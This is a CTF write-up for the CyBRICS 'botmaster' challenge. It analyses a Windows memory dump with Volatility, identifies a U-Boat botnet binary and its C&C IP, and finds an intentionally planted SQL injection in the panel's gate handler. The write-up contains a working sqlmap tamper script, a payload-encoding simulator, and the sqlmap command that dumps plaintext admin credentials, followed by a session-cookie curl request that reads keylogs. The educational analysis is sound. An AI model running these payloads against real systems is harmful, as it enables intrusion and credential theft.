Tags: reverse forensics sqli 

Rating: 5.0

So, we have a memory dump. Let's spin up [volatility](https://github.com/volatilityfoundation/volatility)!

```bash
% python vol.py imageinfo -f ../20200724.mem
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/Users/ilyaluk/ctf/cybrics20/botmaster/20200724.mem)
PAE type : PAE
DTB : 0x185000L
KDBG : 0x8276cc68L
Number of Processors : 2
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0x8276dd00L
KPCR for CPU 1 : 0x807cc000L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2020-07-24 15:44:22 UTC+0000
Image local date and time : 2020-07-24 18:44:22 +0300

% python vol.py --profile=Win7SP1x86_23418 -f ../20200724.mem pstree
Volatility Foundation Volatility Framework 2.6.1
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0x83d3acf0:System 4 0 84 549 2020-07-24 15:39:17 UTC+0000
. 0x84405418:smss.exe 228 4 2 30 2020-07-24 15:39:17 UTC+0000
0x843a4638:csrss.exe 308 288 9 419 2020-07-24 15:39:23 UTC+0000
0x84b14d28:wininit.exe 352 288 5 81 2020-07-24 15:39:24 UTC+0000
. 0x84b46250:services.exe 456 352 7 200 2020-07-24 15:39:26 UTC+0000
.. 0x84bf0b08:svchost.exe 812 456 20 469 2020-07-24 15:39:31 UTC+0000
... 0x84330508:audiodg.exe 960 812 6 131 2020-07-24 15:39:33 UTC+0000
.. 0x84c42b70:svchost.exe 1036 456 23 520 2020-07-24 15:39:34 UTC+0000
.. 0x84d00a48:svchost.exe 1436 456 24 381 2020-07-24 15:39:39 UTC+0000
.. 0x84cbf7e0:svchost.exe 1316 456 18 315 2020-07-24 15:39:37 UTC+0000
.. 0x84d943b8:svchost.exe 1836 456 5 98 2020-07-24 15:39:44 UTC+0000
.. 0x84e7f770:SearchIndexer. 2060 456 11 633 2020-07-24 15:39:59 UTC+0000
... 0x83f4fd28:SearchFilterHo 1732 2060 6 93 2020-07-24 15:43:25 UTC+0000
... 0x843ac030:SearchProtocol 2836 2060 7 278 2020-07-24 15:43:25 UTC+0000
.. 0x83f4b648:svchost.exe 2224 456 12 340 2020-07-24 15:41:46 UTC+0000
.. 0x84b82030:svchost.exe 564 456 11 360 2020-07-24 15:39:29 UTC+0000
... 0x83f72550:WmiPrvSE.exe 716 564 9 123 2020-07-24 15:41:49 UTC+0000
... 0x83fe2d28:WmiPrvSE.exe 3512 564 7 167 2020-07-24 15:42:40 UTC+0000
.. 0x84b98358:svchost.exe 692 456 8 275 2020-07-24 15:39:31 UTC+0000
.. 0x84d34978:taskhost.exe 1996 456 8 187 2020-07-24 15:39:45 UTC+0000
.. 0x84bf9c70:svchost.exe 844 456 19 397 2020-07-24 15:39:32 UTC+0000
... 0x84e25030:dwm.exe 924 844 3 67 2020-07-24 15:39:48 UTC+0000
.. 0x83f5e198:wmpnetwk.exe 284 456 13 435 2020-07-24 15:41:47 UTC+0000
.. 0x83efcac0:sppsvc.exe 336 456 4 144 2020-07-24 15:41:46 UTC+0000
... 0x84b13030:csrss.exe 344 336 8 236 2020-07-24 15:39:24 UTC+0000
.... 0x83fc5998:conhost.exe 2272 344 2 35 2020-07-24 15:44:21 UTC+0000
... 0x84b12418:winlogon.exe 380 336 5 137 2020-07-24 15:39:25 UTC+0000
.. 0x84bfebb8:svchost.exe 872 456 38 1060 2020-07-24 15:39:32 UTC+0000
... 0x83fee7b8:wuauclt.exe 3908 872 5 92 2020-07-24 15:42:55 UTC+0000
.. 0x84c60348:svchost.exe 1132 456 16 384 2020-07-24 15:39:35 UTC+0000
.. 0x84b8d470:VBoxService.ex 628 456 12 117 2020-07-24 15:39:30 UTC+0000
.. 0x84ca0030:spoolsv.exe 1272 456 12 296 2020-07-24 15:39:37 UTC+0000
. 0x84b4d030:lsass.exe 464 352 9 575 2020-07-24 15:39:26 UTC+0000
. 0x84b4e928:lsm.exe 472 352 11 146 2020-07-24 15:39:26 UTC+0000
0x84dee408:explorer.exe 1388 468 42 1124 2020-07-24 15:39:48 UTC+0000
. 0x84e8e908:bot.exe 2444 1388 4 142 2020-07-24 15:40:45 UTC+0000
. 0x84f19360:RamCapture.exe 3296 1388 3 63 2020-07-24 15:44:21 UTC+0000
. 0x84e750e0:VBoxTray.exe 1988 1388 13 171 2020-07-24 15:39:53 UTC+0000
```
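Reading a tree of this size by eye is fine, but on a bigger dump it helps to let a script do the first pass. The following is an added example (not part of the original writeup and not Volatility code): it parses Volatility 2 `pstree` text and pulls out what a triage pass wants, namely processes started by `explorer.exe` (i.e. launched by the logged-on user), processes whose parent has already exited, and user-launched images that are not on an analyst-supplied allow-list. The embedded sample is a constructed excerpt of the listing above, and the allow-list of `VBoxTray.exe` (VirtualBox guest additions) and `RamCapture.exe` (the acquisition tool) is an assumption for this lab VM.

```python
import re

# Constructed excerpt of the Volatility 2 pstree listing above (a subset of
# its lines, same column layout); the parser accepts the full output as well.
PSTREE_SAMPLE = """\
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0x83d3acf0:System 4 0 84 549 2020-07-24 15:39:17 UTC+0000
. 0x84405418:smss.exe 228 4 2 30 2020-07-24 15:39:17 UTC+0000
0x84b14d28:wininit.exe 352 288 5 81 2020-07-24 15:39:24 UTC+0000
. 0x84b46250:services.exe 456 352 7 200 2020-07-24 15:39:26 UTC+0000
.. 0x84bf0b08:svchost.exe 812 456 20 469 2020-07-24 15:39:31 UTC+0000
0x84dee408:explorer.exe 1388 468 42 1124 2020-07-24 15:39:48 UTC+0000
. 0x84e8e908:bot.exe 2444 1388 4 142 2020-07-24 15:40:45 UTC+0000
. 0x84f19360:RamCapture.exe 3296 1388 3 63 2020-07-24 15:44:21 UTC+0000
. 0x84e750e0:VBoxTray.exe 1988 1388 13 171 2020-07-24 15:39:53 UTC+0000
"""

# One pstree row: optional dots for depth, "0x<offset>:<name>", pid, ppid,
# thread and handle counts, then the start timestamp.
LINE_RE = re.compile(
    r"^\s*(?P<depth>\.*)\s*0x[0-9a-fA-F]+:(?P<name>\S+)\s+(?P<pid>\d+)\s+(?P<ppid>\d+)"
    r"\s+\d+\s+\d+\s+(?P<time>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})"
)


def parse_pstree(text):
    """Return {pid: {"name", "ppid", "depth", "time"}} from pstree text.
    Header and separator lines do not match the regex and are skipped."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            procs[int(m["pid"])] = {
                "name": m["name"],
                "ppid": int(m["ppid"]),
                "depth": len(m["depth"]),
                "time": m["time"],
            }
    return procs


def children_of(procs, parent_name):
    """Children of every process called parent_name, oldest first.
    Children of explorer.exe are what the logged-on user launched."""
    parents = {pid for pid, p in procs.items() if p["name"] == parent_name}
    return sorted(
        (p["time"], p["name"], pid) for pid, p in procs.items() if p["ppid"] in parents
    )


def orphans(procs):
    """PIDs whose parent is absent from the listing (the parent already exited).
    Expected for wininit, csrss and explorer on Win7; worth a look anywhere else."""
    return sorted(pid for pid, p in procs.items() if p["ppid"] != 0 and p["ppid"] not in procs)


def unexpected_children(procs, parent_name, expected):
    """User-launched images that are not on the analyst's allow-list."""
    return [(name, pid) for _, name, pid in children_of(procs, parent_name) if name not in expected]


if __name__ == "__main__":
    procs = parse_pstree(PSTREE_SAMPLE)
    # Allow-list is an assumption for this lab box: the VirtualBox tray helper
    # and the tool that took the memory image.
    for name, pid in unexpected_children(procs, "explorer.exe", {"VBoxTray.exe", "RamCapture.exe"}):
        print(f"{name} (pid {pid}) was started by explorer.exe and is not on the allow-list")
```

To run it on a real image, save the `pstree` output to a file and pass `open(path).read()` to `parse_pstree`; the regex tolerates both the fixed-width columns Volatility prints and the collapsed whitespace shown above.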

Huh, `bot.exe`. Seems suspicious. Let's dump the binary and take a look:
```bash
% python vol.py --profile=Win7SP1x86_23418 -f ../20200724.mem procdump -p 2444 -D dump
Volatility Foundation Volatility Framework 2.6.1
Process(V) ImageBase Name Result
---------- ---------- -------------------- ------
0x84e8e908 0x011d0000 bot.exe OK: executable.2444.exe
```

While skimming the strings in this binary we stumble across what looks like a C&C server IP, a few URL paths and fragments of an HTTP client implementation:
```
95.217.215.227
/gate
localhost
/UBoat/gate.php
X-Token
X-Id
POST
HTTP Response Code
%s %s HTTP/1.0
Content-Type: application/x-www-form-urlencoded
```

As it turns out, this is an open-source botnet named [U-Boat](https://github.com/UBoat-Botnet/UBoat).

I ran a small [Dirb](https://tools.kali.org/web-applications/dirb) scan that yielded several pages; the most interesting one was `/login` (of course, that could also have been found by reading the [panel source code](https://github.com/UBoat-Botnet/UBoat-Panel) or by pure guessing):

![](https://i.imgur.com/E34SL0W.png)

Oh, a [download for my friends](http://95.217.215.227/Panel_for_friends.zip). How cool is that? Let's download it and diff it against the latest version from the repo:

```
% diff -rupw UBoat-Panel Panel_for_friends
```

The most suspicious patch is around the construction of an SQL query:

![](https://i.imgur.com/gISCIQn.png)

That looks like an intentional SQL injection. So, how do we trigger it? The patched code handles heartbeats from bots; for instance, it is called from the main `/gate` handler. Note that the handler also takes the bot's IP from the client-supplied `Client-IP` and `X-Forwarded-For` headers when they are present, so both the command data and the IP that end up in the database are under the sender's control:

```php
$heart = $this->loadHelper('heartbeat');
$encrypted = $_POST['x'];
$key = getallheaders()['X-Token'];
$decrypted = $this->BoatDecryptionRoutine($encrypted, $key);

$commandData = null;
$commandType = null;

$commandId = $this->ParseCommand($decrypted, $commandData, $commandType);

$output = $this->CreateCommand(-1, -1, 'This will terminate the app.');

switch ($commandType) {
    case 0:
        //its a join
        //handle the db incertion
        $ip = null;
        if (! empty($_SERVER['HTTP_CLIENT_IP'])) {
            $ip = $_SERVER['HTTP_CLIENT_IP'];
        } elseif (! empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        } else {
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        $_dbcommand = $commandData;
        $_dbcommand .= '@'.$ip;

        $ip = $geo_helper->GetCountryFromAddress($ip);
        $_dbcommand .= '@'.$ip['country_name'].'@'.$ip['country_code'];
        $botId = $heart->beat($heart->splitToArray($_dbcommand));

        $output = $this->CreateCommand(-1, 0, $botId);

        break;
```

Only a trivial XOR "encryption" stands in the way, and the key is taken straight from the `X-Token` request header, which the sender controls as well:

```php
private function ParseCommand($rawData, &$data, &$commandType)
{
    $splitInfo = explode('|', $rawData);
    $data = urldecode($splitInfo[2]);
    $commandType = (int) $splitInfo[1];

    return (int) $splitInfo[0];
}

private function XORInputKey($input, $key, $inputLength, $keyLength)
{
    $output = [];
    for ($i = 0; $i < $inputLength; ++$i) {
        $output[] = $input[$i] ^ $key[$i % $keyLength];
    }

    return $output;
}

//we'll use this xor shit kk

private function BoatDecryptionRoutine($input, $key)
{
    $output = str_split(urldecode($input));
    $key = str_split(urldecode($key));
    $output = $this->XORInputKey($output, $key, count($output), count($key));

    return implode($output);
}
```

Let's write a simple tamper script for sqlmap that wraps every payload in a "join" heartbeat (command id 0, type 0) and XORs it with the one-byte key we send in `X-Token`:

```python
# sqlmap tamper script: U-Boat join heartbeat, XORed with the key '1'
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

# Join data in the '|'- and '@'-separated layout the gate handler parses;
# the payload is appended to the last '@' field.
JOIN = '0|0|{bbed3e02-0b41-11e3-8249-806e6f6e6963}@Microsoft Windows 8@Intel(R) Core(TM)@2.90GHz@NVIDIA GeForce GTX [email protected]@false@1'


def dependencies():
    pass


def xor(data):
    # Same repeating-key XOR as XORInputKey; the key must match X-Token.
    return ''.join(chr(ord(c) ^ ord('1')) for c in data)


def tamper(payload, **kwargs):
    return xor(JOIN + payload)
```
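Before pointing sqlmap at the server it is worth checking that a payload survives the panel's decode path, which decodes the value more than once: PHP decodes the form body into `$_POST['x']`, `BoatDecryptionRoutine` calls `urldecode()` again before the XOR, and `ParseCommand` calls `urldecode()` a third time on the data field. The following is an added example (not the panel's or the writeup's own code) that models that path in Python next to the tamper's encoding side, so the two can be run against each other offline. `split_to_array` is assumed to split on `@`, the separator the gate handler uses when it builds `$_dbcommand`; the join fields, GeoIP result and `REMOTE_ADDR` are constructed; `quote()` stands in for the percent-encoding sqlmap applies to POST data.

```python
from urllib.parse import quote, unquote_plus

KEY = "1"  # value sent in X-Token; the panel urldecodes it and uses it as the XOR key

# Constructed join fields in the same layout as the tamper's hardcoded prefix
# (machine GUID, OS, CPU, clock, GPU, LAN IP, admin flag, version).
JOIN_FIELDS = [
    "{bbed3e02-0b41-11e3-8249-806e6f6e6963}", "Microsoft Windows 8", "Intel(R) Core(TM)",
    "2.90GHz", "NVIDIA GeForce GTX", "192.0.2.10", "false", "1",
]


def xor_input_key(data: bytes, key: bytes) -> bytes:
    """Mirror of XORInputKey: repeating-key XOR, which is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def boat_decryption_routine(x: str, token: str) -> str:
    """Mirror of BoatDecryptionRoutine: urldecode input and key, then XOR.
    $_POST['x'] was already decoded by PHP once, so this is a second decode."""
    data = unquote_plus(x, encoding="latin-1").encode("latin-1")
    key = unquote_plus(token, encoding="latin-1").encode("latin-1")
    return xor_input_key(data, key).decode("latin-1")


def parse_command(raw: str):
    """Mirror of ParseCommand: 'id|type|data'. The data field is urldecoded a
    third time, so a '+' inside the SQL payload itself would become a space."""
    parts = raw.split("|")
    return int(parts[0]), int(parts[1]), unquote_plus(parts[2], encoding="latin-1")


def split_to_array(dbcommand: str):
    # Assumption: heartbeat->splitToArray splits on '@', the separator the
    # gate handler uses when it builds $_dbcommand.
    return dbcommand.split("@")


def transport_safe(cipher: bytes) -> bool:
    """After the XOR the bytes must contain neither '+' nor '%': the panel's
    second urldecode would turn '+' into a space and consume '%XX' sequences."""
    return b"+" not in cipher and b"%" not in cipher


def build_x(payload: str, key: str = KEY, fields=JOIN_FIELDS) -> str:
    """Attacker side (what the sqlmap tamper does): build the join command
    '0|0|<fields>...<payload>', XOR it, and percent-encode the bytes once."""
    if "|" in payload:
        raise ValueError("'|' in the payload would truncate the data field in ParseCommand")
    plain = "0|0|" + "@".join(fields) + payload
    cipher = xor_input_key(plain.encode("latin-1"), key.encode("latin-1"))
    if not transport_safe(cipher):
        raise ValueError("ciphertext contains '+' or '%'; pick another key or payload")
    return quote(cipher, safe="")


def rejected(payload: str, key: str = KEY) -> bool:
    """True if build_x refuses the payload (shows the two failure modes above)."""
    try:
        build_x(payload, key)
    except ValueError:
        return True
    return False


def simulate_gate(posted_x: str, token: str, remote_addr: str = "198.51.100.7"):
    """Server side: PHP decodes the form body, then the /gate join branch runs.
    Returns the command type and the '@'-split fields handed to heart->beat()."""
    x_param = unquote_plus(posted_x, encoding="latin-1")  # what lands in $_POST['x']
    plain = boat_decryption_routine(x_param, token)
    _cmd_id, cmd_type, data = parse_command(plain)
    # Constructed GeoIP result; REMOTE_ADDR is used when no proxy header is set.
    dbcommand = data + "@" + remote_addr + "@Example Land@EX"
    return cmd_type, split_to_array(dbcommand)


if __name__ == "__main__":
    ctype, fields = simulate_gate(build_x("' OR 1=1-- -"), KEY)
    print(ctype, fields)
```

With the key `1` the only plaintext bytes that XOR to `+` or `%` are the control characters `0x1a` and `0x14`, so ordinary sqlmap payloads pass `transport_safe`; the check matters more once a longer or different `X-Token` value is used.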

From `src/uboat.sql` we know that the password is stored in plaintext in the `user` table of the `uboat` DB, so this should do the trick:

```bash
% sqlmap -u 'http://95.217.215.227/gate' --headers='X-Token:1' --data "x=1" -p "x" --method POST --tamper tamper.py -D uboat -T user -C username,password --dump
```

```
Database: uboat
Table: user
[1 entry]
+----------+-------------+
| username | password |
+----------+-------------+
| root | p@$$w0Rd123 |
+----------+-------------+
```

Neat, let's log in to the dashboard:

![](https://i.imgur.com/feXSPZr.png)

The VirtualBox machine running Win7 looks like what we need. For some reason I could not use U-Boat's UI to read the logs (right-click on bot → read logs), so let's poke at it with curl, using what we know from the panel source code:

```
% curl 'http://95.217.215.227/tasks/readLog' \
--data 'bot=57' \
-H 'Cookie: PHPSESSID=1c391ad1cc0663425b41b46c75db61db'

Left Windows
rnotepad[Enter]

cybrics{be_safe_from_bots}[Enter]

[Enter]
```

> `cybrics{be_safe_from_bots}`